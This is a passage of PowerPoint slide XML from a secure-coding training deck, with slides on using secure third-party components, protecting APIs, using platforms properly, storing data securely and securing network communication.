              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a vulnerable component is exploited, such an attack can facilitate </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>serious data loss or server takeover.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications and APIs using components with known vulnerabilities </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>may undermine application defenses and enable various attacks and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>impacts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not use components that you did not write (when practical).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish policies regarding the use of third-party components in your software projects, such as selection criteria, required licensing provisions, testing, and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>maintenance practices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know all of the third-party components and the versions your software </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>uses, including all dependencies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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Use Secure Components (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049711D9-8AF5-49B3-B0CD-BF84F6E46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3AC02D93-BBC7-4AC3-ADD7-DDC0D7489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83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57</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7179015" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove any third-party components that are present in the project, but not actually invoked at runtime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monitor any vulnerabilities of third-party components you use, through issue-tracking and vulnerabilities databases, project mailing lists, and security mailing lists.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When possible, use automated tools like Retire.js, Dependency-Check, Victims, and CVEChecker to continuously monitor for vulnerabilities in client- and server-side third-party components and their dependencies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your software is using the version of components with the most recent security updates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you discover a vulnerability in a component, determine whether its vulnerability affects your software.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide security wrappers around components to disable any unused </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>functionality and fortify any vulnerable functions within the component.</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Use Secure Components (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71473EA5-5615-45BE-AA16-50B13A23E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DF45E54F-E6B0-4AC9-930E-4774EB889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810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58</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These APIs are often unprotected and contain numerous vulnerabilities. </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Make Sure APIs are Protected (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C1153A-0990-4641-8A33-4A578A062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1D626AB3-CDF7-41AC-970B-750EB36ED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05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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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341925" y="1302040"/>
            <a:ext cx="7807665" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test your APIs for vulnerabilities, considering such issues as injection, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>authentication, access control, encryption, and configuration—just as </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>you would for any other code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Include all of your APIs in your security analysis and testing processes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure all communication between your client and your APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a strong authentication scheme for your APIs, and secure all credentials, keys, and tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Harden the parser configuration for whatever data format your requests use.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example configuration options, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your access control scheme protects APIs from being improperly </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>invoked, including unauthorized function and data references.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Make Sure APIs are Protected (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C1153A-0990-4641-8A33-4A578A062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web png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D626AB3-CDF7-41AC-970B-750EB36ED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00000">
            <a:off x="7251142" y="2118525"/>
            <a:ext cx="1272484" cy="127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803BF-C984-4242-8839-D5871754A300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common General Programming Errors (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A0EF9B-ED67-4086-B30B-51C3B27E6885}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341924" y="1371600"/>
            <a:ext cx="8268676" cy="4870938"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most developers are unaware of security risks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A few types of common errors are responsible for many types of vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Development tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide warnings and hints about common errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can help you write better code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pay attention to what they tell you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carefully research the configuration options available in your development tool kit. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some options are not well known.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Their purpose may not be immediately clear.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They may not be enabled by default, but they </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can be very helpful.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So invest time to understand all of your tools' configuration options.</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C07EF89D-EDA1-4559-AD63-A4E495D1EA5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBD70DD0-4F4B-4552-9E32-7CD93899E74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5731728" y="4953000"/>
            <a:ext cx="2878872" cy="1415760"/>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32888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60</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302040"/>
            <a:ext cx="7181349" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Misuse of a platform feature or failure to use platform security controls can lead to vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: Providing excessive platform permissions and misusing security controls such as iOS Keychain, the Android Keystore System, Windows Hello, encryption APIs, and so forth.</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Use Platforms Properly (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10"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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E98F283-BD6C-437B-B67A-F1F1632AB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17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61</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302040"/>
            <a:ext cx="7181349" cy="5143430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow the guidelines provided by the vendor whose platform you are developing on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, if you are developing iOS apps, follow Apple's guidelines. If you are developing on Google Cloud Services, follow Google's guidelines for that platform. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever you use a platform or service that is new to you, assume that you are not using the platform properly, and test your code carefully to prove that assumption wrong.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow best practices and conventions established by the development community.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition to the vendor guidelines, developers establish best </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>practices through time and experience that become de facto </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>standards.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement separate data encryption/validation in case the mobile device is rooted/jailbroken.</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Use Platforms Properly (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="183013" y="1387385"/>
            <a:ext cx="1358175" cy="1174293"/>
            <a:chOff x="183013" y="1241081"/>
            <a:chExt cx="1358175" cy="1174293"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10"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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E98F283-BD6C-437B-B67A-F1F1632AB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34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62</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066068"/>
            <a:ext cx="6631735" cy="5403560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing data improperly may expose it or cause unintended data leakage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This covers a wide range of possible problem areas, such as file and object storage on local drives, SD cards, network volumes, and cloud storage, as well as memory caches, databases, log files, web cookies, and browser local storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities may originate from a variety of sources, such as the operating system, frameworks, and the compiler environment. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt all sensitive app data that is at rest (in storage) in the device, or do not save it at all.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect caches, keyboard logs, and debugging output to the console.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clear sensitive data to protect it from screenshots and copying and pasting. When the app enters the background, clear text fields and other user interface components that contain sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat-model software and its dependencies to understand how stored assets are accessed and processed. </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Store Data Securely (Slide 1 of 2)</a:t>
            </a:r>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E4E222A5-21FA-4173-AD09-8597077C6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16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63</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302040"/>
            <a:ext cx="7181350" cy="5403560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for problems in areas such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL caching of requests and responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keyboard keypress caching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clipboard (copy/paste buffer) caching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What happens when the software loses focus and moves to the background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any intermediate data storage locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analytics data transmitted to third parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser local storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser cookies</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Store Data Securely (Slide 2 of 2)</a:t>
            </a:r>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E4E222A5-21FA-4173-AD09-8597077C6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938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64</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302039"/>
            <a:ext cx="7181350" cy="5555961"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All aspects of packaging sensitive data and transmitting it into or out of the device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using services improperly, exposing data, and transmitting sensitive assets without encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Communication between applications, between devices, between an application and server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Technologies such as TCP/IP, Wi-Fi, Bluetooth, NFC, audio, infrared, GSM, 3G, SMS, and RFID.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Transport layer security problems, such as poor handshaking, using vulnerable SSL versions, failing to check certificates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data such as passwords, tokens, encryption keys, private user information, account details, documents, metadata, and code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risks to data in transit, such as unauthorized viewing or modification, and the inability to prove the data's origin.</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Secure Communication (Slide 1 of 2)</a:t>
            </a:r>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8079A334-4287-46A5-88B3-D1696CD43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602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0235D-CBE6-4234-9067-4140E40E98B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BAD56FE-1DAF-4DC5-B678-A94F114644C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302039"/>
            <a:ext cx="7181350" cy="5555961"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To avoid this defect:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure the network is securely configured, but program as though network security will eventually be compromised. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use transport layer encryption (e.g., HTTPS, TLS, SSL) whenever possible—especially for sensitive data or session tokens.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect data and requests transmitted between a client and server (e.g., parameterized queries to avoid SQL injection).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not send sensitive data over inappropriate channels, such as SMS, MMS, or notification services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account for outside entities (e.g., analytics, social networks) by using their SSL versions for routines run in the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use strong, industry standard encryption algorithms with appropriate key lengths.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use certificates signed by a trusted CA and certificate pinning for security conscious applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require SSL chain verification, and establish a secure connection only after you verify the identity of the endpoint server using trusted certificates in the key chain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fail safely. Block communication and alert the user if the application </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>detects an invalid certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If practical, encrypt sensitive data before providing it to SSL to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>provide an extra layer of defense.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{322EDB59-7C6E-4474-851A-6C04040C9241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Communication (Slide 2 of 2)</a:t>
            </a:r>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D9AFDECD-AC61-46D8-BDF0-F7404FC5E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232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66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620725" y="1302040"/>
            <a:ext cx="7181350" cy="5219630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing, inappropriate, or flawed authentication of the end user, or weak session management, can give an attacker elevated rights or access to sensitive data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
